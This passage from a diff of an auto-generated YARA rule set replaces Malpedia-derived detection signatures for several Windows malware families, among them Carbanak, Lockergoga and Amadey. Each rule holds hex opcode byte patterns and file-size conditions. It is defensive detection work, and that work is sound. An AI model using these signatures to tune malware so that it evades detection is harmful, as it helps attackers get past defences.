-		$sequence_3 = { 75f3 8bf3 8a03 43 }
-		$sequence_4 = { 50 6a01 6a6b 57 ff15???????? }
-		$sequence_5 = { 50 6a01 6a6b 57 }
-		$sequence_6 = { 8d7601 884c32ff 84c9 75f3 8bf3 }
-		$sequence_7 = { 0f57c0 c745dc00000000 33c0 660fd645d4 33db 8945d8 }
-		$sequence_8 = { 0f57c0 c745dc00000000 33c0 660fd645d4 33db 8945d8 895dd4 }
-		$sequence_9 = { 2bc6 83f801 732f 8b0f 8bc1 2bc6 48 }
+		$sequence_0 = { 6a00 6a40 6a01 6a01 6a00 6a00 8d55e8 }
+		$sequence_1 = { 8b55f4 6689044a ebd0 8b450c 8b4df4 }
+		$sequence_2 = { 83f861 7c13 0fbe4d08 83f97a 7f0a 0fbe5508 83ea20 }
+		$sequence_3 = { 52 e8???????? 83c408 8b0d???????? 8981d8000000 }
+		$sequence_4 = { 740d 8b45fc 2d00080000 8945fc ebe5 8b45fc }
+		$sequence_5 = { 8b45fc 2d00080000 8945fc ebe5 8b45fc 8be5 }
+		$sequence_6 = { 55 8bec 51 837d0800 7441 837d0c00 }
+		$sequence_7 = { 52 e8???????? 83c408 8b0d???????? 89819c000000 }
+		$sequence_8 = { 55 8bec 8b450c 8d4c0002 51 }
+		$sequence_9 = { e8???????? 83c404 8b5508 8b4204 50 8b4d08 8b5108 }
 
 	condition:
-		7 of them and filesize < 851968
+		7 of them and filesize < 417792
 }
-rule MALPEDIA_Win_Satan_Auto : FILE
+rule MALPEDIA_Win_Govrat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "30dbe56c-8c73-5146-b780-34e6bf716dbf"
+		id = "ff29bbeb-8470-59b6-8c8d-ff2db3e011bb"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.satan"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.satan_auto.yar#L1-L129"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.govrat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.govrat_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "684fd8d03725a857adc2201582faa570633fcd21041d464e35a18c1f078d9ea5"
+		logic_hash = "c76f210fc8b3b328515ee8d578bc776ba7dc3be5b77e3088a18f7d949286c3a2"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -115918,32 +116235,32 @@ rule MALPEDIA_Win_Satan_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 57 837d0c00 740c c78560ffffff01000000 eb0a c78560ffffff00000000 8b8560ffffff }
-		$sequence_1 = { e8???????? 8d4da4 e8???????? 83ee00 }
-		$sequence_2 = { 8a82c8c64700 884118 ebda c745fc00000000 eb09 8b4dfc 83c101 }
-		$sequence_3 = { 6bd117 8982d0d14700 68???????? 8b45fc 50 ff15???????? 3305???????? }
-		$sequence_4 = { c745e801000000 c745e401000000 c745e0bc070000 8d55f8 52 8d45f4 }
-		$sequence_5 = { 7409 ff30 8bcf e8???????? 8b45e8 894708 }
-		$sequence_6 = { 8b10 52 8d4df8 e8???????? 8d4df8 e8???????? 0fb6c0 }
-		$sequence_7 = { 50 e8???????? 83c40c b90c000000 8d75cc 8b7d0c f3a5 }
-		$sequence_8 = { 0f42c8 8b5614 8bc2 f7d0 894dfc 3bc1 0f8607010000 }
-		$sequence_9 = { e8???????? 8d45b8 c745fc10000000 50 8d45e4 b9???????? 50 }
+		$sequence_0 = { c1fa05 8b1495609e4300 83e61f c1e606 f644320480 7417 8bd1 }
+		$sequence_1 = { 5b c3 55 8bec 81ec84010000 a1???????? 33c5 }
+		$sequence_2 = { d1f8 e8???????? 5e c20800 807c240400 7428 837e1808 }
+		$sequence_3 = { e8???????? 8b4658 85c0 755f 83ff14 720e 3945f8 }
+		$sequence_4 = { 2aca d3e8 8bca d3e7 8d8ba00e0300 51 03c7 }
+		$sequence_5 = { c605????????01 e8???????? 837df808 8b45e4 7303 8d45e4 68???????? }
+		$sequence_6 = { 7406 ff15???????? 68d0070000 ff15???????? 6a02 ff15???????? 81fe01000b80 }
+		$sequence_7 = { 83c004 2bfa 4f 8938 83c004 5f 5e }
+		$sequence_8 = { 68???????? eb05 68???????? e8???????? 50 8d4594 50 }
+		$sequence_9 = { 0345f8 8b4d14 8904b1 46 3b7510 72e4 5e }
 
 	condition:
-		7 of them and filesize < 1163264
+		7 of them and filesize < 761856
 }
-rule MALPEDIA_Win_Carbanak_Auto : FILE
+rule MALPEDIA_Win_Snojan_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "34d24f6c-b1d1-51ed-9905-23e69a560a3f"
+		id = "9f201807-eca2-5671-8fb1-4c54ce96e5b1"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.carbanak"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.carbanak_auto.yar#L1-L127"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.snojan"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.snojan_auto.yar#L1-L124"
 		license_url = "N/A"
-		logic_hash = "fa6cd9a85a7bf81411d9c274df92be474253e26394edfb9f41f2cdb268401124"
+		logic_hash = "1d25311cfd419aa863c883b495c4bbb0986a7541ebe6286749992456a12c9723"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -115957,33 +116274,32 @@ rule MALPEDIA_Win_Carbanak_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e9???????? 3d2c5c0700 750a e8???????? e9???????? }
-		$sequence_1 = { 85c0 7509 e8???????? b001 }
-		$sequence_2 = { 7c0d e8???????? 84c0 7504 33c0 }
-		$sequence_3 = { 7907 32c0 e9???????? 7507 b001 }
-		$sequence_4 = { ba31af8402 8d6b09 8bcd e8???????? 33d2 33c9 }
-		$sequence_5 = { 450f44fc e8???????? 488b8d20010000 ffd0 488d4c2460 }
-		$sequence_6 = { 4183c9ff 4d8bc7 488bc8 458d7921 418bd7 e8???????? }
-		$sequence_7 = { 8b8614020000 8b4d10 83c40c 40 69c084000000 890c30 }
-		$sequence_8 = { e8???????? 8b00 8b7004 eb0b c6043e00 46 }
-		$sequence_9 = { 8d8d2cfeffff e8???????? ff35???????? 8d45fc 50 e8???????? }
-		$sequence_10 = { 56 8b7510 8bc6 83e001 83e602 57 }
+		$sequence_0 = { 8d442bfc c744240804000000 c7442404???????? 890424 }
+		$sequence_1 = { 81c43c900100 31c0 5b 5e 5f }
+		$sequence_2 = { 8b4dc0 6689810000986d 83c30c 81fb???????? 0f8285feffff e9???????? }
+		$sequence_3 = { 83f8ff 0f8452010000 c7442404???????? c70424???????? e8???????? 85c0 89c6 }
+		$sequence_4 = { 31db eb02 89c3 8d4301 8b14859026986d 85d2 }
+		$sequence_5 = { e8???????? 29c4 c744240806000000 c744240401000000 c7042402000000 ff15???????? 83ec0c }
+		$sequence_6 = { 85c9 0f84c3feffff e9???????? 0fb7810000986d 894dc0 89c7 }
+		$sequence_7 = { 56 53 e8???????? 29c4 c744240806000000 c744240401000000 c7042402000000 }
+		$sequence_8 = { 7421 85db 740c ff149d9026986d 83eb01 75f4 }
+		$sequence_9 = { b8???????? e8???????? 85c0 74e9 a1???????? 8b988000986d }
 
 	condition:
-		7 of them and filesize < 658432
+		7 of them and filesize < 90112
 }
-rule MALPEDIA_Win_Murofet_Auto : FILE
+rule MALPEDIA_Win_Ddkong_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "2ee51841-1931-5e92-8698-30f3c51730b7"
+		id = "b5952305-5353-5501-a1a7-08eb6dbe1f60"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.murofet"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.murofet_auto.yar#L1-L119"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ddkong"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.ddkong_auto.yar#L1-L124"
 		license_url = "N/A"
-		logic_hash = "9298e47cf759c52371e794c7e892c3c0542296ba15da499ce2f22bd9f2d8e48e"
+		logic_hash = "63fd2294d146377f9037ca4f08ce95fd06d019686efc226016c406199e6b874d"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -115997,32 +116313,32 @@ rule MALPEDIA_Win_Murofet_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? a2???????? 84c0 7510 e8???????? 3c04 }
-		$sequence_1 = { e8???????? a2???????? 84c0 7510 e8???????? 3c04 73ce }
-		$sequence_2 = { 7510 e8???????? 3c04 73ce b002 }
-		$sequence_3 = { 56 ff15???????? c6443eff00 83f8ff 7509 56 ff15???????? }
-		$sequence_4 = { 72e5 e8???????? a2???????? 84c0 }
-		$sequence_5 = { 8816 e8???????? 0fb6c0 99 }
-		$sequence_6 = { 6a10 8d4624 55 50 ff15???????? }
-		$sequence_7 = { a2???????? 84c0 7510 e8???????? 3c04 73ce b002 }
-		$sequence_8 = { a2???????? 84c0 7510 e8???????? 3c04 73ce }
-		$sequence_9 = { 8d4624 55 50 ff15???????? }
+		$sequence_0 = { 50 ffd7 ff750c 8bf0 66c745dc0200 ff55fc }
+		$sequence_1 = { 8d45f0 50 c645c44d c645c56f c645c676 c645c765 c645c846 }
+		$sequence_2 = { 8b4c3878 85c9 8b44387c 894c2410 745a 85c0 }
+		$sequence_3 = { c645b963 c645ba75 c645bb72 c645bc69 }
+		$sequence_4 = { 53 6a03 e8???????? 83c40c 6a0a }
+		$sequence_5 = { c685d1feffff75 c685d2feffff70 c685d3feffff6c c685d4feffff69 c685d5feffff63 c685d6feffff61 }
+		$sequence_6 = { ab 33c9 33c0 8d7dc4 894dc0 }
+		$sequence_7 = { 53 ff55f8 53 ff55f4 6a01 ff7508 e8???????? }
+		$sequence_8 = { c645d146 c645d269 c645d36c c645d465 c645d54e c645d661 c645d76d }
+		$sequence_9 = { 72f6 ff7604 57 ff742418 e8???????? 83c40c 395e1c }
 
 	condition:
-		7 of them and filesize < 622592
+		7 of them and filesize < 81920
 }
-rule MALPEDIA_Win_Excalibur_Auto : FILE
+rule MALPEDIA_Win_Bredolab_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "2243999a-f912-5283-8db6-7a7e597c07e9"
+		id = "c6a2080f-c1fa-51ce-a641-734a6742f158"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.excalibur"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.excalibur_auto.yar#L1-L127"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bredolab"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.bredolab_auto.yar#L1-L118"
 		license_url = "N/A"
-		logic_hash = "58bc3d918cc2c57a1f8a313886d8855731ce5abe92983e974335457efdd3438d"
+		logic_hash = "2bd111cf3554a8f40745e475f3dd7434ed1da715b8da17d69e83265e9fb05367"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -116036,32 +116352,32 @@ rule MALPEDIA_Win_Excalibur_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 3902 7518 8b442468 8b4c246c }
-		$sequence_1 = { 894238 8b45d4 89423c 8b45d0 894240 5f }
-		$sequence_2 = { 744b 833f02 750e e8???????? c685bfe5ffff00 eb0c e8???????? }
-		$sequence_3 = { 32db 8bf1 85ff 7543 8b4d08 c70100000000 33d2 }
-		$sequence_4 = { 68e9fd0000 ffd3 83bd8cfbffff10 6a00 6a00 }
-		$sequence_5 = { 8b4d08 81c144060000 ba04000000 894d08 be01000000 03f6 0fb70c0e }
-		$sequence_6 = { 897c05ac eb2b 0f853e010000 85c9 0f8720010000 8b45e0 7208 }
-		$sequence_7 = { 8b75d8 8a5de7 f6c310 0f84b3000000 8d559c 8bce e8???????? }
-		$sequence_8 = { 83c404 33c0 83bd1cffffff08 c7854cffffff07000000 c78548ffffff00000000 66898538ffffff 720e }
-		$sequence_9 = { 8d8d2cffffff c645fc08 e8???????? 57 8bd0 8d8d14ffffff }
+		$sequence_0 = { 84c9 0f849f000000 83fe01 0f8426010000 }
+		$sequence_1 = { 891c24 e8???????? 89c6 ebbf 55 89e5 57 }
+		$sequence_2 = { f3a4 c64415d800 8b550c 89542404 890424 }
+		$sequence_3 = { e9???????? 89f3 c7864c09000000000000 40 7496 }
+		$sequence_4 = { ff15???????? 57 57 8b45e4 }
+		$sequence_5 = { 8a4d10 d3e3 899d60ffffff 8b4510 8a4d0c d3e0 03450c }
+		$sequence_6 = { 0f84f0feffff c744240802000000 8b8d70ffffff 894c2404 8b9574ffffff }
+		$sequence_7 = { 8b5514 891424 ff15???????? 83ec1c 89c2 83f8ff }
+		$sequence_8 = { e8???????? 84c0 7409 8b45f4 83c434 5b }
+		$sequence_9 = { 85c0 0f88ad000000 c7442410e0710010 c744240c40640010 c744240804000000 }
 
 	condition:
-		7 of them and filesize < 1253376
+		7 of them and filesize < 90112
 }
-rule MALPEDIA_Win_Ripper_Atm_Auto : FILE
+rule MALPEDIA_Win_Lockergoga_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "e53a9e99-401d-50a0-8b9f-eabc46d865fe"
+		id = "098a7a92-b383-59d8-91b6-0fe20ed4e757"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ripper_atm"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.ripper_atm_auto.yar#L1-L130"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lockergoga"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.lockergoga_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "d8b90900e28d85311ea385a629a5f77668a5882f0cccbfa3d22ef622cc722131"
+		logic_hash = "c582e783be4f8c1eccf17c3665e883eb649b80d6c64ac8df726791d94d7fb2de"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -116075,71 +116391,71 @@ rule MALPEDIA_Win_Ripper_Atm_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 56 ff15???????? 85c0 7413 83671000 c747140f000000 c60700 }
-		$sequence_1 = { 89742414 83cbff 395d08 7507 33c0 e9???????? 8b4620 }
-		$sequence_2 = { 7485 80f90d 7480 40 8907 e9???????? 8b4760 }
-		$sequence_3 = { 6824010000 b8???????? e8???????? 8d4508 33f6 50 ba???????? }
-		$sequence_4 = { 57 8bfe 8955f8 894dfc 897dec 3bf0 7445 }
-		$sequence_5 = { 8d45ec 50 8d4de0 c745ec00000400 }
-		$sequence_6 = { 8bf2 897518 8955f8 3bd7 741c 3b4514 }
-		$sequence_7 = { 8b148df0974400 83e31f c1e306 894df4 8a441a04 895ddc a801 }
-		$sequence_8 = { 334ad8 3342dc 334a28 33422c 330a 334204 894cf428 }
-		$sequence_9 = { 56 33f6 ffb6b0784300 ff15???????? 8986b0784300 83c604 83fe28 }
+		$sequence_0 = { e8???????? e9???????? c16d0c1f 8bc1 99 8bc8 c745d40f000000 }
+		$sequence_1 = { 6a01 895dec e8???????? 8d4b08 c703???????? c6411900 c74120ffffffff }
+		$sequence_2 = { e8???????? 8be5 5d c20c00 ffb51cffffff 8bcf e8???????? }
+		$sequence_3 = { ff10 8b4e3c 83f910 722c 8b4628 41 81f900100000 }
+		$sequence_4 = { 8d45f4 64a300000000 8bf1 8b06 ff90a4000000 85c0 7423 }
+		$sequence_5 = { f7ea 035584 c1fa05 8bc2 c1e81f 03c2 7458 }
+		$sequence_6 = { eb0f 57 8d4dc8 e8???????? 8b45cc 8945f0 807d0700 }
+		$sequence_7 = { 8b4830 85c9 7409 8b11 83c028 50 ff521c }
+		$sequence_8 = { e8???????? 807e1000 7562 8b4e04 8bc7 8a10 3a11 }
+		$sequence_9 = { e8???????? 8d4dbc e8???????? 8d8d2cffffff e8???????? 8b4df4 64890d00000000 }
 
 	condition:
-		7 of them and filesize < 724992
+		7 of them and filesize < 2588672
 }
-rule MALPEDIA_Win_Wininetloader_Auto : FILE
+rule MALPEDIA_Win_Unidentified_111_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "7ea47534-c96c-52ac-bf22-909791f16181"
-		date = "2024-10-31"
-		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.wininetloader"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.wininetloader_auto.yar#L1-L134"
+		id = "761c3c1a-627b-5adf-b1c2-f96f11c05a94"
+		date = "2023-12-06"
+		modified = "2023-12-08"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_111"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.unidentified_111_auto.yar#L1-L125"
 		license_url = "N/A"
-		logic_hash = "b330f726e24dbb98ed7560a78537474ae8441347d679ef8681cdcfe81bca90ca"
+		logic_hash = "8a86a6eb9509e0a5b4e912cde53abfcabb23f3644fc565d69ca8396c5dc5d7c9"
 		score = 75
 		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
 		signator_config = "callsandjumps;datarefs;binvalue"
-		malpedia_rule_date = "20241030"
-		malpedia_hash = "26e26953c49c8efafbf72a38076855d578e0a2e4"
-		malpedia_version = "20241030"
+		malpedia_rule_date = "20231130"
+		malpedia_hash = "fc8a0e9f343f6d6ded9e7df1a64dac0cc68d7351"
+		malpedia_version = "20230808"
 		malpedia_license = "CC BY-SA 4.0"
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 48895c2408 57 4883ec20 488bda 488d05ccd10400 488901 488d5108 }
-		$sequence_1 = { 8b3b 0f1f00 33c0 4d8bce 85ff 7422 488b4b10 }
-		$sequence_2 = { 48895c2438 488bfa 4889742440 488d5920 33f6 0f1f00 488b13 }
-		$sequence_3 = { 84c0 0f84b5f7ffff 4c8d25b2df0200 498bcc 49391f 741c 0fb711 }
-		$sequence_4 = { 4c897580 48c7458807000000 664489742470 ba68000000 488d4c2470 e8???????? 4c8bd0 }
-		$sequence_5 = { ff15???????? 488b4e18 ba6d230000 ff15???????? 33d2 488bc8 448d4201 }
-		$sequence_6 = { 498b06 b230 498bce 488b4040 ff15???????? 408af8 660f6f05???????? }
-		$sequence_7 = { 660bd0 b800240000 03c2 66413bc5 0f8787000000 0fb7c2 2d00dc0000 }
-		$sequence_8 = { 410f1007 0f29442460 4d85f6 7427 408a7c2420 498bf2 408ad7 }
-		$sequence_9 = { eb03 498bff 4c8bc6 488bd7 eb55 488b3d???????? 4885ff }
+		$sequence_0 = { 488b4c2428 0fbe09 3bc1 7512 }
+		$sequence_1 = { c744242002000000 e9???????? 837c243406 7511 837c243801 750a }
+		$sequence_2 = { 8b00 488b4c2430 488b09 0fbe0401 48634c2404 488b542428 0fbe0c0a }
+		$sequence_3 = { eb43 41b901000000 448b442424 488b542428 488b4c2448 e8???????? }
+		$sequence_4 = { eb1f c744242000000000 4533c9 4533c0 }
+		$sequence_5 = { 488b4c2448 ff15???????? 89442444 837c244400 7502 eb11 }
+		$sequence_6 = { 488d8c0c60020000 ba02000000 486bd200 4803ca 448bc0 488b542420 e8???????? }
+		$sequence_7 = { 66c1ca08 0fb7d2 4c8b8424a0000000 450fb74006 6641c1c808 450fb7c0 4c8b8c24a0000000 }
+		$sequence_8 = { e8???????? b910000000 e8???????? 4889442448 488b442448 488b4c2450 488908 }
+		$sequence_9 = { 4889542410 48894c2408 4883ec78 c744243000000000 c744243400000000 488b942488000000 488d4c2448 }
 
 	condition:
-		7 of them and filesize < 2659328
+		7 of them and filesize < 148480
 }
-rule MALPEDIA_Win_Petrwrap_Auto : FILE
+rule MALPEDIA_Win_Snatchcrypto_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "5211c1ab-7958-5b82-8edd-8be8e9b0a5eb"
+		id = "a0e595f3-b394-5bbb-9fbf-3f77b7a2ff1c"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.petrwrap"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.petrwrap_auto.yar#L1-L133"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.snatchcrypto"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.snatchcrypto_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "e84b96f3a3ec1cc8c24cef6cd623aa7e9ff5aec503f26b4080d6b5046ccfe346"
+		logic_hash = "df174efff90118ed4513d3543230102fa070bff240e3fca742525b945490dabd"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -116153,34 +116469,34 @@ rule MALPEDIA_Win_Petrwrap_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83bf9c00000000 7422 e8???????? 89869c000000 85c0 744d ffb79c000000 }
-		$sequence_1 = { 8d4304 55 53 50 e8???????? 50 56 }
-		$sequence_2 = { 894c2444 8b28 8b5804 8bc5 8bcb 0facc813 8bfd }
-		$sequence_3 = { 8b8c2418010000 11460c 8b442428 014610 8b442420 114614 8b442450 }
-		$sequence_4 = { 85c0 0f85ab000000 837dec00 0f84a1000000 8b55f4 8b049580db4600 }
-		$sequence_5 = { 53 55 57 6a0a ffd1 83c410 8bc6 }
-		$sequence_6 = { 8b4d00 89450c 8b03 894c2424 8d04b0 2bf2 c1fe1f }
-		$sequence_7 = { 3b4608 7f04 8bc6 eb12 50 56 e8???????? }
-		$sequence_8 = { 83c410 837df000 741e 90 8d45ec 6a3a 50 }
-		$sequence_9 = { 687f010000 68???????? 8d0480 03c0 6a12 6a09 89442458 }
+		$sequence_0 = { 413ac5 740d 3c03 7514 80be9102000000 750b f6c180 }
+		$sequence_1 = { 0100 d3da 0100 4bdb01 0038 db01 0096db010096 }
+		$sequence_2 = { 4c8d25e5930300 41c70701000000 e9???????? 498b95b8000000 488d0dc3930300 41b805000000 e8???????? }
+		$sequence_3 = { 7821 0f1f840000000000 4533c9 488d542420 488bcb 458d4120 ff15???????? }
+		$sequence_4 = { e9???????? 488bd3 498bcd e8???????? 85c0 7414 488d15669d0300 }
+		$sequence_5 = { 412bc9 4103cf 3bce 0f42f1 418bcf 482bd1 8bcd }
+		$sequence_6 = { 413bc4 0f87d3000000 6685f6 0f84c5000000 41bd04000000 0f1f00 66443bee }
+		$sequence_7 = { 498d4b02 488d942450020000 482bd1 0fb701 4883c102 6689440afe 6685c0 }
+		$sequence_8 = { 753f 488b5f08 4883c708 4885db 75e4 488d157dd30300 4d8bc4 }
+		$sequence_9 = { 488bd9 4883c108 33f6 e8???????? 85c0 7413 817b3463feffff }
 
 	condition:
-		7 of them and filesize < 1024000
+		7 of them and filesize < 1400832
 }
-rule MALPEDIA_Win_Nabucur_Auto : FILE
+rule MALPEDIA_Win_Amadey_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "af73c704-0513-5e82-a77f-ce8e36675074"
+		id = "b3fa836d-4682-51f6-8e5a-a32138bd7f60"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nabucur"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.nabucur_auto.yar#L1-L163"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.amadey_auto.yar#L1-L207"
 		license_url = "N/A"
-		logic_hash = "ff7129cae3af06c4bcbd1090aa15a0e8967082d3699d9e4f74992cad1754f8c1"
+		logic_hash = "47b9b6106a12c197931c79a9b3b33bf3efcee93c9479f6b1617cd096d3785a21"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -116192,38 +116508,43 @@ rule MALPEDIA_Win_Nabucur_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 49 23cf 894c241c 3bc3 }
-		$sequence_1 = { 49 3b442430 891e 8944241c }
-		$sequence_2 = { 49 23ce 894f18 8bf0 85c0 0f8521040000 }
-		$sequence_3 = { 49 40 0bf2 85c9 }
-		$sequence_4 = { 49 23cb 894d08 5d }
-		$sequence_5 = { 33ff 397c2434 7e61 8b6c2434 }
-		$sequence_6 = { 009eaa030000 0fb686aa030000 57 83f80a 0f876d010000 }
-		$sequence_7 = { 49 03d3 40 85c9 75f4 8916 }
-		$sequence_8 = { 8b4508 8b00 50 ff15???????? 83bdecfeffff00 }
-		$sequence_9 = { 4d a1???????? 138df6adfe2a 44 b80c83f6cd }
-		$sequence_10 = { 07 03fa d448 f242 26684ef6e738 46 28c1 }
-		$sequence_11 = { be???????? bbb31d3ff8 bb9a21baf8 eb7f 49 }
-		$sequence_12 = { fa dc90fa3d14db 8736 6c 2f }
-		$sequence_13 = { 83f901 752e bae6c060fb eb1f 46 }
-		$sequence_14 = { 6695 09b899f00150 cf 1bf6 47 e5b8 }
-		$sequence_15 = { 49 bbe19321fa e9???????? ba3665c4ff 3006 ebeb }
+		$sequence_0 = { 837e1410 7202 8b3e 8a0402 88040f 41 }
+		$sequence_1 = { 83f802 7427 e8???????? 83f810 }
+		$sequence_2 = { 83c408 83ec18 8bf4 83ec18 8bcc 68???????? }
+		$sequence_3 = { 8b10 ff7010 837d4c10 8d4d38 8b7548 0f434d38 }
+		$sequence_4 = { 83caff 8b4508 8bc8 83781410 7202 8b08 }
+		$sequence_5 = { 83f801 7431 e8???????? 83f802 7427 }
+		$sequence_6 = { 8bcc 68???????? e8???????? 8d4db4 e8???????? }
+		$sequence_7 = { 68???????? e8???????? 8d4dcc e8???????? 83c418 }
+		$sequence_8 = { 68???????? e8???????? 8d4d98 e8???????? 83c418 }
+		$sequence_9 = { 722f 8b8d78feffff 42 8bc1 81fa00100000 }
+		$sequence_10 = { 8985f4fbffff 8b85ecfbffff c1e002 8985f0fbffff 8b85f4fbffff 890424 e8???????? }
+		$sequence_11 = { e8???????? c7442404???????? 8d85e8feffff 890424 e8???????? 8d85e8feffff 890424 }
+		$sequence_12 = { c70424???????? e8???????? 8b45fc 89442408 c7442404???????? }
+		$sequence_13 = { 8d85f8fdffff 890424 e8???????? c744240800020000 c744240400000000 }
+		$sequence_14 = { 50 68???????? 83ec18 8bcc 68???????? }
+		$sequence_15 = { e8???????? 8985f4dfffff 83bdf4dfffff00 742c }
+		$sequence_16 = { 8945f4 eb05 ff4508 eba7 8b45f4 }
+		$sequence_17 = { 890424 e8???????? 89442404 8d85f8f9ffff 890424 e8???????? }
+		$sequence_18 = { eb0a c705????????04000000 83bd5cffffff06 7525 83bd60ffffff02 }
+		$sequence_19 = { 56 57 8b3d???????? 83ec18 }
+		$sequence_20 = { 51 e8???????? 83c408 8b9514feffff }
 
 	condition:
-		7 of them and filesize < 1949696
+		7 of them and filesize < 908288
 }
-rule MALPEDIA_Win_Fusiondrive_Auto : FILE
+rule MALPEDIA_Win_Cryptoshield_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "6b24ebb4-bf8c-5059-8d46-133c8671d36b"
+		id = "d469a41b-f805-5bc0-8014-b5aff846fede"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.fusiondrive"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.fusiondrive_auto.yar#L1-L121"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptoshield"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.cryptoshield_auto.yar#L1-L116"
 		license_url = "N/A"
